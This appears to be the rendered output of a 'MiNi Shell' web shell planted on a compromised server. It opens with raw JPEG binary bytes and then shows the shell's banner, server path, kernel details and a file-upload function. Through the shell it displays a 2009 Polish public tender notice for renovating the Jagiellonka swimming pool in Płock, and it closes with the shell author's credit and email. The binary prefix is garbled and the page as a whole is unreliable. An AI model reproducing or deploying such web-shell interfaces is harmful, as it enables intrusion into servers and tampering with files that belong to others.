JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/146009-N-2009.html

<p class="kh_header"><b>Płock: remont pomieszczeń administracyjno-socjalnych wewnątrz budynku na Pływalni Miejskiej Jagiellonka w Płocku, ul. 3 Maja 4</b><br>
<b>Numer ogłoszenia: 146009 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Obiektów Sportowych Jednostka Budżetowa , pl. Dąbrowskiego 2a, 09-402 Płock, woj. mazowieckie, tel. 024 2678430, faks 024 2678439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzos.ump.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remont pomieszczeń administracyjno-socjalnych wewnątrz budynku na Pływalni Miejskiej Jagiellonka w Płocku, ul. 3 Maja 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac remontowych pomieszczeń wewnątrz budynku administracyjno-socjalnego oraz wykonanie prac remontowych na zewnątrz obiektu Pływalni Miejskiej Jagiellonka w Płocku przy ul. 3 Maja 4 wchodzącej w skład Miejskiego Zespołu Obiektów Sportowych J.B.
Szczegółowy zakres robót do wykonania:
Prace wewnątrz obiektu:
I. łazienka w hallu wejściowym:
1. przesunięcie włącznika o 20 cm (bez zakupu nowego włącznika);
2. przesunięcie grzejnika c.o. o 50 cm (bez zakupu nowego grzejnika);
3. rozbiórka okładzin ściennych - 2,20 m2;
4. wykucie z muru ościeżnicy metalowej - 1 szt.; 
5. rozbiórka ścian gr. 20 cm - 0,09 m3;
6. usunięcie i wywiezienie gruzu z rozbiórki - 0,09 m3; 
7. wykonanie na ościeżach i ścianach tynków zwykłych wewnętrznych, cementowo-wapiennych, kat. III - 2,70 m2;
8. wykonanie na ościeżach i ścianach tynków jednowarstwowych wewnętrznych, gr. 3 mm, z gipsu szpachlowego - 2, 70 m2;
9. montaż ościeżnicy drewnianej 90/210 cm - 1 szt.;
10. montaż skrzydła drzwiowego wewnętrznego szerokości 80 cm, pełnego, drewnianego, wytłaczanego, fabrycznie wykończonego, z kratką nawiewną u dołu - 1 szt.;
11. dwukrotne malowanie farbą emulsyjną ścian otynkowanych po rozbiórce - 2,20 m2;
II. pokój kierownika obiektu:
1. przesunięcie włącznika o 25 cm (bez zakupu nowego włącznika);
2. wykucie z muru ościeżnicy metalowej - 1 szt.;
3. rozbiórka ścian gr. 12 cm - 0,126 m3;
4. usunięcie i wywiezienie gruzu z rozbiórki - 0,126 m3;
5. wykonanie na ścianach tynków zwykłych wewnętrznych, cementowo-wapiennych, kat. III - 2,10 m2;
6. wykonanie na ścianach tynków jednowarstwowych wewnętrznych, gr. 3 mm, z gipsu szpachlowego - 2,10 m2;
7. montaż ościeżnicy drewnianej 100/210 cm - 1 szt.;
8. montaż skrzydła drzwiowego wewnętrznego szerokości 90 cm, pełnego, drewnianego, wytłaczanego, fabrycznie wykończonego - 1 szt.;
9. dwukrotne malowanie ścian farbą emulsyjną - 32,00 m2;
III. sekretariat kierownika obiektu:
1. przesunięcie włącznika o 35 cm (bez zakupu nowego włącznika);
2. wykucie z muru ościeżnicy metalowej - 1 szt.;
3. rozbiórka ścian gr. 12 cm - 0,126 m3;
4. usunięcie i wywiezienie gruzu z rozbiórki - 0,126 m3;
5. wykonanie na ścianach tynków zwykłych wewnętrznych, cementowo-wapiennych, kat. III - 2,10 m2;
6. wykonanie na ścianach tynków jednowarstwowych wewnętrznych, gr. 3 mm, z gipsu szpachlowego - 2,10 m2;
7. montaż ościeżnicy drewnianej 100/210 cm - 1 szt.;
8. montaż skrzydła drzwiowego wewnętrznego szerokości 90 cm, pełnego, drewnianego, wytłaczanego, fabrycznie wykończonego - 1 szt.;
9. dwukrotne malowanie ścian farbą emulsyjną - 29,00 m2;
IV.	pomieszczenie magazynu na parterze:
1. zeskrobanie złuszczonej farby po zalaniu na suficie - 8,70 m2;
2. usunięcie wykwitów (zacieków) na suficie - 8,70 m2;
3. szpachlowanie powierzchni sufitu - 8,70 m2;
4. szpachlowanie sufitu wykonanego z płyty gipsowo-kartonowej (za belką) - 0,70 m2;
5. uszczelnienie przejść rur kanalizacyjnych przez sufit - 3 szt. pionów O 50 mm;
6. miejscowe szpachlowanie ubytków w ścianie za pionem kanalizacyjnym - 0,50 m2; 
7. wykonanie (zaślepienie) sufitu z wodoodpornych płyt gipsowo-kartonowych wokół przejść pionów wentylacji mechanicznej przez strop wraz ze szpachlowaniem - 2,25 m2;
8. dwukrotne malowanie sufitu farbą emulsyjną - 9,40 m2;
9. dwukrotne malowanie ścian farbą emulsyjną - 49,00 m2;
V. hall wejściowy:
1.zeskrobanie złuszczonej farby po zalaniu na suficie z miejscowym szpachlowaniem - 
      0,36 m2;
2. usunięcie wykwitów (zacieków) na suficie - 0,36 m2;
3. demontaż i montaż nowej zabudowy nadproża z płyty wodoodpornej gipsowo-kartonowej nad drzwiami wejściowymi do hallu głównego - 1,70 m2;
4. szpachlowanie zabudowy nadproża z G-K - 1,70 m2;
5. dwukrotne malowanie sufitu farbą emulsyjną - 7,45 m2; 
6. dwukrotne malowanie ścian farbą olejną - 11,00 m2;
VI. hall główny + szatnia:
1. uzupełnienie betonem otworu w stropie - 0,02 m2;
2. zeskrobanie złuszczonej farby po zalaniu na suficie z miejscowym szpachlowaniem 
      - 6,05 m2;
3. zeskrobanie złuszczonej farby po zalaniu na nadprożu nad drzwiami wejściowymi z miejscowym szpachlowaniem - 0,75 m2
4. usunięcie wykwitów (zacieków) na suficie i nadprożu - 6,80 m2
5. dwukrotne malowanie sufitu farbą emulsyjną - 66,00 m2
6. dwukrotne malowanie nadproża nad drzwiami wejściowymi farbą emulsyjną - 2,85 m2;
7. dwukrotne malowanie ścian farbą olejną - 143,00 m2; 
8. dwukrotne malowanie ścian farbą emulsyjną - 33,00 m2;
9. malowanie farbą olejną rur c.o. o średnicy O 2,50 mm - 16,5 mb;
10. malowanie kraty w wejściu do bufetu - 1,50 m2;
VII. hall na piętrze:
1.ustawienie rusztowania na schodach w celu możliwości wykonania prac naprawczych i malarskich sufitu;
2.zeskrobanie złuszczonej farby po zalaniu na suficie z miejscowym szpachlowaniem - 
      5,50 m2;
3. usunięcie wykwitów (zacieków) na suficie i na nadprożu - 5,50 m2;
4. dwukrotne malowanie sufitu farbą emulsyjną - 133,50 m2;
5. dwukrotne malowanie ścian farbą olejną - 99,00 m2;
6. dwukrotne malowanie grzejników - 7,5 m2;
VIII.	korytarze przy szatniach na piętrze:
1. zeskrobanie złuszczonej farby po zalaniu na sufitach z miejscowym szpachlowaniem
      - 9,00 m2;
2. zeskrobanie złuszczonej farby po zalaniu na słupkach międzyokiennych z miejscowym szpachlowaniem - 10,00 m2;
3. usunięcie wykwitów (zacieków) na sufitach i nadprożach - 19,00 m2;
4. naprawa rys na sufitach - 33,00 mb;
5. dwukrotne malowanie sufitów farbą emulsyjną - 71,50 m2;
6. dwukrotne malowanie ścian farbą olejną - 120,00 m2;
7. malowanie cokołów o wys. 15 cm farbą olejną - 37,00 mb;
8. malowanie farbą olejną rur c.o. o średnicy O 2,50 mm - 66,00 mb;
9. malowanie grzejników - 4,5 m2;
IX. sala gimnastyczna na piętrze:
1. zeskrobanie złuszczonej farby po zalaniu na słupie narożnym z miejscowym szpachlowaniem - 1,40 m2;
2. zeskrobanie złuszczonej farby po zalaniu na suficie z miejscowym szpachlowaniem - 0,30 m2;
3. usunięcie wykwitów (zacieków) na suficie i słupie - 1,70 m2;
4. dwukrotne malowanie sufitu farbą emulsyjną - 78,50 m2;
5. dwukrotne malowanie ścian farbą olejną - 106,00 m2;
6. malowanie farbą olejną parapetu wewnętrznego (0,52 m2) - 4 szt.;
X. pomieszczenie w piwnicy wokół niecki basenowej:
1. skucie luźnych fragmentów betonu - 2,60 m2;
2. zabetonowanie ubytków w posadzce betonowej zaprawą cementową gr. 10 cm - 2,60 m3;
XI. szatnia dla chłopców:
1. zeskrobanie ze ściany pozostałej farby - 1,50 m2;
2. przyklejenie i zafugowanie płytek ceramicznych o wymiarach 20 x 20 cm na ścianach - 1,50 m2;
Prace na zewnątrz obiektu:
XII. opaska z kostki betonowej przy ścianie południowej basenu:
1. korytowanie - 4 m3;
2. obsadzenie obrzeży trawnikowych gr. 6 cm - 50,00 mb;
3. ułożenie kostki betonowej szarej gr. 6 cm ze spadkiem, na podsypce cementowo-piaskowej - 40,00 m2;
4. wykonanie cokołu wys. 50 cm na elewacji z tynku mozaikowego wodoopornego - 
      25,00 m2;
XIII. opaska betonowa przy ścianie zachodniej budynku:
1. uzupełnienie opaski betonem gr. 5 cm - 3,30 m2;
XIV. naprawa słupa na ścianie zachodniej budynku:
1. naprawa tynku elewacyjnego o powierzchni 0,5 m2 na słupie metodą lekko-mokrą z boniowaniem listwą plastikową o dł. 0,55 m i szer. 3 cm;
2. wykonanie przed słupami odbojnika stalowego z rur czarnych O~50 mm (zgodnie z rys. w siwz). Słupki wysokości 45 cm mocowane do podłoża betonowego za pomocą kotew poprzez otwory w stopach słupków z blachy stalowej gr. 6 mm przyspawanych do słupków. Wszystkie powierzchnie stalowe oczyszczone do drugiego stopnia czystości, pomalowane farbą podkładową, antykorozyjną i pomalowane w kolorach ostrzegawczych, tj. czarno-żółtych.
Termin realizacji zamówienia: 45 dni kalendarzowych od dnia przekazania wykonawcy terenu robót.
Wymagany okres gwarancji udzielony przez wykonawcę: minimum 36 miesięcy.
Załącznikami do opisu przedmiotu zamówienia w siwz są:
- przedmiar robót,
- Specyfikacja techniczna wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.40.00.00-1, 45.31.00.00-3, 45.23.32.22-1, 45.23.32.91-5, 45.44.21.00-8, 45.41.00.00-4, 45.43.12.00-9, 45.26.23.60-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O zamówienie publiczne mogą ubiegać się wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania działalności w zakresie objętym przedmiotem zamówienia tzn. prowadzą działalność gospodarczą w odpowiednim zakresie zarejestrowaną w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tzn.: wykonawca musi wykazać, że posiada doświadczenie zawodowe niezbędne do wykonania zamówienia, tj. że zrealizował w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości minimum 35.000,00 zł brutto; wykonawca musi dysponować osobą, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności właściwej dla powierzonego stanowiska - konstrukcyjno-budowlanej, wystarczające do zakresu rzeczowego przedmiotu postępowania. Osoba ta musi być członkiem odpowiedniej izby samorządu zawodowego inżynierów budownictwa i ubezpieczona od odpowiedzialności cywilnej;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy - Prawo zamówień publicznych. 
2) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że:warunki określone w pkt. 1 lit. a, d - spełnia każdy z wykonawców, warunki określone w pkt. 1 lit. b, c - spełniają łącznie wszyscy wykonawcy.
3) Zamawiający dokona oceny spełnienia warunków wymaganych od wykonawców na podstawie złożonego oświadczenia i dokumentów opisanych w ust. 7 pkt 1 niniejszej specyfikacji, wg formuły spełnia, nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) oświadczenie wykonawcy w trybie art. 22 ustawy; 
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzające dopuszczenie wykonawcy do obrotu prawnego w zakresie objętym zamówieniem, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert; 
3) wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (co najmniej 1 zamówienie o wartości minimum 35.000,00 zł brutto), z podaniem ich wartości, przedmiotu, daty i miejsca wykonania, odbiorców oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie - załącznik nr 3 do SIWZ; 
4) wypełniony formularz Potencjał kadrowy stanowiący załącznik nr 4 do SIWZ - wyznaczenie kierownika robót, którym dysponuje lub będzie dysponował wykonawca i który będzie uczestniczyć w wykonywaniu zamówienia. Należy również załączyć: dokument potwierdzający posiadanie wymaganych uprawnień budowlanych kierownika robót w specjalności odpowiadającej przedmiotowi zamówienia - konstrukcyjno-budowlanej, aktualny dokument potwierdzający przynależność kierownika robót do właściwej izby samorządu zawodowego inżynierów budownictwa i posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej;
pisemne zobowiązanie innych podmiotów do udostępnienia osoby zdolnej do wykonania zamówienia, jeżeli w załączniku nr 4 do SIWZ wykonawca wskazał osoby, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzos.ump.pl/bip/remont_st.pdf.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 09-402 Płock, pl. J. Dąbrowskiego 2a, pokój nr 9. Druk SIWZ płatny 13,64 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 12:00, miejsce: 09-402 Płock, pl. J. Dąbrowskiego 2a, pokój nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com